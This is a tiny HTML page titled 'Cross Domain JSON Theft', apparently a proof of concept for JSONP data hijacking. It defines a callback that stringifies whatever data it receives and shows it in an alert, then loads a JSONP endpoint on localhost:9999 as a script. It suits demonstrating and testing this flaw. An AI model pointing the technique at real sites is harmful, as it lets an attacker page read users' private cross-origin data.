<html>
<head>
<title>Cross Domain JSON Theft</title>
<script>
   function aaa(data)
   {
     json_str = JSON.stringify(data);
	 alert(json_str);
   }
</script>
</head>
<body>
 <script src="http://localhost:9999/callback.json"></script>
</body>